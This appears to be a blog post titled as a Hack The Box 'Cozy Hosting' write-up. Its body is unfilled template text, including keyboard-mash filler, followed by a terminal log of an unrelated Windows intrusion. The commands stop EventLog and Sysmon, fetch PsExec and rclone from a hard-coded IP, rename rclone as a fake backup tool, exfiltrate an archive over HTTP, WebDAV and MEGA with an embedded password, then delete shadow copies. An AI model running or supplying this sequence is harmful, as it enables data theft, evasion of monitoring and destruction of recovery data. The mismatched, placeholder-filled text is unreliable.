Dave Taylor
Authors
  • avatar
    Name
    Dave Taylor
    Twitter

Sections

Published on

Cozy Hosting

Summary

Short summary of the HTB box and your approach.

Steps 1 2 3 4 5 6 7 8 9 10 fiojfhioew fewioewjfioefwj fewoijfewjioefwjio efwijfewifewjio fjioewjefwio

  1. Enumeration
  2. Exploitation
  3. Privilege Escalation

Artifacts

  • HTTP requests, payloads, exploit scripts
Terminal window
wmic shadowcopy call create Volume='C:\'
systeminfo
systeminfo > C:\Temp\recon_systeminfo.txt
systeminfo | Out-File C:\Temp\recon_systeminfo.txt
23 collapsed lines
New-Item C:\Exfil_Temp -ItemType Directory -Force
systeminfo | Out-File C:\Exfil_Temp\recon_systeminfo.txt
netstat -ano | Out-File C:\Exfil_Temp\recon_netstat.txt
sc query
sc query type= service
sc query type=service
sc query state=all
sc.exe query
Stop-Service -Name EventLog
Stop-Service -Name EventLog -Force
Stop-Service -Name Sysmon -Force
Stop-Service -Name Sysmon64 -Force
Invoke-WebRequest http:167.172.41.141/PsExec.exe -OutFile $env:TEMP\psexec.exe -UseBasicParsing
Invoke-WebRequest http://167.172.41.141/PsExec.exe -OutFile $env:TEMP\psexec.exe -UseBasicParsing
C:\Users\MATTHE~1.COL\AppData\Local\Temp\psexec.exe -accepteula -i -s powershell.exe
Invoke-WebRequest http://167.172.41.141/7z2409-x64.exe -OutFile $env:TEMP\7zz.exe -UseBasicParsing
Invoke-WebRequest http://167.172.41.141/rclone-v1.70.2-windows-amd64/rclone.exe -OutFile $env:TEMP\rclone.exe -UseBasicParsing
New-Item C:\ProgramData\sync -ItemType Directory -Force
Copy-Item $env:TEMP\7zz.exe C:\ProgramData\sync\
Copy-Item $env:TEMP\pssexec.exe C:\ProgramData\sync\
Copy-Item $env:TEMP\psexec.exe C:\ProgramData\sync\
Rename-Item $env:TEMP\rclone.exe C:\ProgramData\sync\backup_win.exe
Rename-Item $env:TEMP\rclone.exe "C:\ProgramData\sync\backup_win.exe"
@"`
[crmremote]`
type = http`
url = http://167.172.41.141:8080`
"@ | Set-Content "C:\ProgramData\sync\\crmhttp.conf" -Encoding ASCII
& "C:\ProgramData\sync\backup_win.exe" --config "C:\ProgramData\sync\crmhttp.conf" copy C:\Exfil_Temp.7z crmremote:
@"`
[crmremote]`
type = webdav`
url = http://167.172.41.141:8080`
"@ | Set-Content "C:\ProgramData\sync\\crmhttp.conf" -Encoding ASCII
& "C:\ProgramData\sync\backup_win.exe" --config "C:\ProgramData\sync\crmhttp.conf" copy C:\Exfil_Temp.7z crmremote:
Invoke-WebRequest -Uri "http://167.172.41.141:8080/Exfil_Temp.7z"
Invoke-WebRequest -Uri "http://167.172.41.141:8080/Exfil_Temp.7z" ``
-Method Put ``
-InFile "C:\Exfil_Temp.7z" ``
-ContentType "application/octet-stream"
[System.Net.ServicePointManager]::Expect100Continue = $false
Invoke-WebRequest -Uri "http://167.172.41.141:8080/Exfil_Temp.7z" ``
-Method Put ``
-InFile "C:\Exfil_Temp.7z" ``
-ContentType "application/octet-stream"
@"`
27 collapsed lines
[crmremote]`
type = mega`
user = harmlessuser98@proton.me`
pass = Wrt@5LXo6k6dum&JF9`
"@ | Out-File "C:\ProgramData\sync\mega.conf" -Encoding ASCII
& "C:\ProgramData\sync\backup_win.exe" --config "C:\ProgramData\sync\mega.conf" copy C:\Exfil_Temp.7z crmremote:DecptiTech_exfil_backups/
@"`
[crmremote]`
type = mega`
user = harmlessuser98@proton.me`
pass = & "$env:TEMP\backup_win.exe" obscure Wrt@5LXo6k6dum&JF9`
"@ | Out-File "C:\ProgramData\sync\mega.conf" -Encoding ASCII
& "C:\ProgramData\sync\backup_win.exe" --config "C:\ProgramData\sync\mega.conf" copy C:\Exfil_Temp.7z crmremote:DecptiTech_exfil_backups/
$MegaPass = (& "$env:TEMP\backup_win.exe" obscure "Wrt@5LXo6k6dum&JF9"`
)
@"`
[crmremote]`
type = mega`
user = harmlessuser98@proton.me`
pass = $MegaPass`
"@ | Out-File "C:\ProgramData\sync\mega.conf" -Encoding ASCII
& "C:\ProgramData\sync\backup_win.exe" --config "C:\ProgramData\sync\mega.conf" copy C:\Exfil_Temp.7z crmremote:DecptiTech_exfil_backups/
Remove-Item "$env:TEMP\7zz.exe" -Force
Remove-Item "$env:TEMP\backup_win.exe" -Force
Clear-RecycleBin -Force
vssadmin delete shadows /all quiet
vssadmin delete shadows /all /quiet
Load Image into FTK Imager